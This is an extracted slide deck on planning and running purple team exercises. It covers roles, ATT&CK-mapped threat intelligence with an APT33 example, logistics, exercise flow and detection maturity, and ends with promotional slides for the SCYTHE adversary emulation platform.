    @JORGEORCHILLES Roles and Responsibilities TitleRole Responsibility CISO/Head of Information Security Sponsor Approve Exercise and Budget Red Team Manager Sponsor & Attendee Define Goals, Select Attendees, Select TTPs SOC Manager Sponsor & Attendee Define Goals, Select Attendees, Select TTPs Incident Response Manager Sponsor Define Goals, Select Attendees, Select TTPs CTI Analyst Sponsor Define Goals, Select TTPs Participants Attendees Prepare, Attend, Action Items Exercise Coordinator 1-2 Operational Managers that lead Preparation Phase activities, participate in or observe the exercise, and responsible for the Lessons Learned document. Record minutes, notes, action items, and feedback. Send daily emails with those notes as well as plan for the next day.
  • 18.
    @JORGEORCHILLES Framework & Methodology 18 ●Cyber Kill Chain – Lockheed Martin ● Unified Cyber Kill Chain – Paul Pols ● Financial/Regulatory Frameworks ○ CBEST Intelligence Led Testing ○ Threat Intelligence-Based Ethical Red Teaming ○ Red Team: Adversarial Attack Simulation Exercises ○ Intelligence-led Cyber Attack Simulation Testing ○ A Framework for the Regulatory Use of Penetration Testing in the Financial Services Industry ● Testing Framework:
  • 19.
  • 20.
    @JORGEORCHILLES Threat Intelligence 20 David Bianco:http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
  • 21.
    @JORGEORCHILLES Threat Intelligence 21 S0129 –AutoIT T1068 – Exploitation for Privilege Escalation S0194 - PowerSploit T1003 - Credential Dumping IP Address S0002 - Mimikatz S0192 - Pupy Hash Value T1086 - Powershell
  • 22.
  • 23.
    @JORGEORCHILLES #ThreatThursday ● Weekly Adversary ○Introduce Adversary ○ Consume CTI and map to MITRE ATT&CK ○ Present Adversary Emulation Plan ○ Share the plan on SCYTHE Community Threat Github: ■ https://github.com/scythe-io/community-threats/ ○ Emulate Adversary ○ How to defend against adversary ● All updated here: https://www.scythe.io/threatthursday 23
  • 24.
    @JORGEORCHILLES All about theTTPs ● Planning is extremely important ● Choose TTPs that are: ○ Not prevented ○ Logged ○ Detected ○ Alerted ● Focus is on improving people and process 24
  • 25.
    @JORGEORCHILLES Tabletop TTPs withManagers ● Identify controls expected for those TTPs and which teams should have visibility of TTP activity ● Create table showing expected outcomes per team: 25 Procedure Technique Tactic Detection SOC Hunt IR <TTP1> <Technique1> <Tactic1> <Control1> x x x <TTP2> <Technique2> <Tactic2> <Control2> x x <TTP3> <Technique3> <Tactic3> <Control3> x x <TTP4> <Technique4> <Tactic4> <Control4> x x
  • 26.
    @JORGEORCHILLES Determine Tools toUse - C2 Matrix ● Google Sheet of C2s ● https://www.thec2matrix.com/ ● Find ideal C2 for your needs ● https://howto.thec2matrix.com ● SANS Slingshot C2 Matrix VM ● @C2_Matrix 26
  • 27.
  • 28.
    @JORGEORCHILLES APT33 28 Tactic Description Description APT33is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations in the United States, Saudi Arabia, and South Korea, in multiple industries including governments, research, chemical, engineering, manufacturing, consulting, finance, telecoms, and several other sectors. Objective Establishing persistent access to partners and suppliers of targets. Mounting supply chain attacks Command and Control T1043 - Commonly Used Port: Port 80 and 443; T1071 - Standard Application Layer Protocol: HTTP and HTTPS; T1032 - Standard Cryptographic Protocol T1065 - Uncommonly Used Port: Ports 808 and 880 Initial Access T1192 – Spear phishing Link; T1110 - Brute Force; T1078 - Valid Accounts Execution T1204 - User Execution; T1203 - Exploitation for Client Execution Defense Evasion T1132 - Data Encoding; T1480 - Execution Guardrails: Kill dates in payload; T1027 - Obfuscated Files or Information; T1086 – PowerShell Discovery T1040 - Network Sniffing Privilege Escalation T1068 - Exploitation for Privilege Escalation Persistence T1060 - Registry Run Keys / Startup Folder; T1053 - Scheduled Task Credential Access T1003 - Credential Dumping: Publicly available tools like Mimikatz Exfiltration T1002 - Data Compressed; T1048 - Exfiltration Over Alternative Protocol https://www.scythe.io/library/threatthursday-apt33
  • 29.
    @JORGEORCHILLES Logistics 29 ● Pick alocation ● Virtual or Remote? ○ Virtual: Choose a Platform (Zoom, GoToMeeting, etc) ○ For physical locations: SOC locations are ideal as SOC Analysts, Hunt Team, and Incident Response are generally physically present ■ Obtain travel approval from sponsors ■ Plan to arrive a day early ■ Training room or large conference room ● Each attendee should have workstation with media output or screen sharing to show current screen to other participants
  • 30.
    @JORGEORCHILLES Target Systems Provision productionsystems for exercise that represent the organization ● Endpoint Operation Systems ○ Windows 7 through 10 – multiple hosts ○ Terminal Services/Citrix ● Server Operating Systems ○ Windows Servers ○ *nix Servers ● Consider physical, virtual, VDI and cloud servers 30
  • 31.
    @JORGEORCHILLES Security Tools Request thetarget systems have production security tools: ● Anti-Virus/Anti-Malware ● Anti-Exploit ● Endpoint Detection & Response ● Forensic Tools ○ Image acquisition ○ Live forensics 31
  • 32.
    @JORGEORCHILLES Target Accounts Service orsecondary accounts should be created for logging into systems, accessing Internet, receiving email, and to ensure real production credentials are not compromised ● Request secondary account of a standard user ● Request Standard Email Access ● Request Internet Access ● Add accounts as local administrator of some target systems 32
  • 33.
    @JORGEORCHILLES Attack Infrastructure ● Chooseand procure external hosting provider ● Create internal and Internet virtual machines ○ Only allow connection from organization proxies and Red Team IP addresses ○ Obtain and add external IP address of External Line of location of event ○ Build Credential theft site or Payload delivery sites ○ Setup C2 Infrastructure – based on payloads and TTPs ● Ensure SMTP servers allow sending emails into organization ● Purchase Domains and TLS Certificates ● Provide IP addresses and Domains to SOC for allowing access ● Ensure systems are allowed on any Network Access Controls 33
  • 34.
    @JORGEORCHILLES Red Team Preparation ●Setup at least 2 laptops to show the attack activity live ● Ensure Attack Infrastructure is fully functional ● Ensure Target Systems are fully functional ● Document all commands required to emulate TTPs (Adversary Emulation Manual) ● Setup resource scripts/framework equivalent to generate payloads and setup handlers ● Test TTPs before exercise on different hosts than the exercise hosts but that are configured alike 34
  • 35.
  • 36.
    @JORGEORCHILLES SOC/Hunt Team Preparation ●Validate security tools are reporting to SOC production tools from the target systems ● Ensure C2 allowlist of the Red Team domains ● Ensure TLS decryption for the Red Team domains ● Verify allow-list ● Work with Red Team during testing of payloads and C2 prior to exercise ● Ensure laptop or workstations have access to all tools for showing on large screen in exercise location 36
  • 37.
    @JORGEORCHILLES Incident Response Preparation ●Create an IR case/id ○ This will allow tagging artifacts and following normal processes without flagging any suspicious activity e.g. pulling memory from a system that does not have a formal case ● Ensure the correct forensic tools are deployed on the target systems ● Consider anyway to speed up BAU process ● Install Live Forensic Tools for efficiency ○ Sysmon ○ Processmon 37
  • 38.
    @JORGEORCHILLES Kick Off theExercise ● Sponsor kicks off the exercise ● Motivate the attendees ● Go over the flow of the exercise 38
  • 39.
    @JORGEORCHILLES Exercise Flow 1. RedTeam presents the TTP and technical details ○ Attack Vector ○ Delivery Method ○ User Interaction ○ Privilege gained ○ Tool or exploit used 2. Purple Team discussion of controls based on delivery method ○ SOC: Any logs or alerts for this TTP ○ Hunt Team: Any Hunt Cases for this TTP ○ Incident Response: Documented methods to identify if TTP was leveraged 39
  • 40.
    @JORGEORCHILLES Exercise Flow 3. RedTeam executes the TTP ○ Provides attacker IP address ○ Provides target ○ Provides exact time ○ Shows the attack on projector 4. SOC, Hunt, and IR follow process to identify evidence of TTP ○ Time must be monitored to meet expectation and move exercise along 40
  • 41.
    @JORGEORCHILLES Measure Detection Maturity 0.Emulation does not generate events 1. Emulation generates events locally 2. Emulation generates events centrally (no alert) 3. Emulation triggers an alert 4. Emulation triggers the response process 41 Shout out to @mvelazco for above See his DerbyCon Talk “I sim(ulate), therefore I catch”
  • 42.
  • 43.
    @JORGEORCHILLES Exercise Flow 5. Showon screen if TTP was identified, received logs, alert, or forensic data a. Time to detect and/or time to receive alert b. Red Team stops TTP 6. Document what worked and what did not 7. Is there any short term adjustments that can increase visibility? a. Implement adjustment b. Red Team re-runs TTP 8. Document any Action Items 9. Repeat flow for the next TTP 43
  • 44.
    @JORGEORCHILLES Exercise Closure ● Atleast one dedicated Exercise Coordinator should be on assigned to take minutes, notes, action items, and feedback ● Daily emails should be sent to all attendees and sponsors with minutes, action items, and plan for the next day ● The Exercise Coordinator is responsible for the creation of a Lessons Learned document following each exercise ● A feedback request should be sent to all attendees on the last day of the Purple Team Exercise to obtain immediate feedback, while it is fresh on attendee’s minds ● Lessons Learned documents should be completed and sent to Sponsors and Attendees less than 30 days after the exercise has concluded 44
  • 45.
  • 46.
  • 47.
    @JORGEORCHILLES What is SCYTHE? ●Enterprise-Grade platform for Adversary Emulation ○ Creating custom, controlled, synthetic malware ○ Can be deployed on-premises or your cloud ● Emulate known threat actors against an enterprise network ○ Consistently execute adversary behaviors ○ Continually assess security controls ○ Decreased evaluation time of security technologies ○ Identify blind spots for blue teams ○ Force-multiplier for red team resources ○ Measure and improve response of people and process 47
  • 48.
    @JORGEORCHILLES Features & Capabilities ●Trivial installation ● Enterprise C2 ○ HTTP(S), DNS, SMB ○ Google, Twitter, Stego ● Automation ○ Build cross-platform synthetic malware via dashboard ○ Synthetic malware emulates chosen behaviors consistently ● Delivery methods ○ Web Page/ Drive-by (T1189) ○ Phishing Link (T1192) ○ Phishing Attachment (T1193) ● Reports ○ HTML Report, CSV Report, Executive Report and Technical Report ○ Mapped to MITRE ATT&CK ● Integrations ○ PlexTrac - automated report writing and handling ○ Integrated with SIEMs (Splunk and Syslog) ○ Red Canary’s Atomic Red Team test cases ○ RedELK and VECTR integration in progress 48
  • 49.
  • 50.
    @JORGEORCHILLES What’s Next? ● SCYTHEv3 Released July 7, 2020 ○ Virtual File System ○ Threat Automation language ■ Structured Data out of Unstructured Data ■ Use results of one action for the next action ● Module SDK ○ Python and Native ○ In-memory loading techniques ● Marketplace ○ Ecosystem of third party contributors ○ Create custom modules ○ Request custom modules - TTP Bounty 50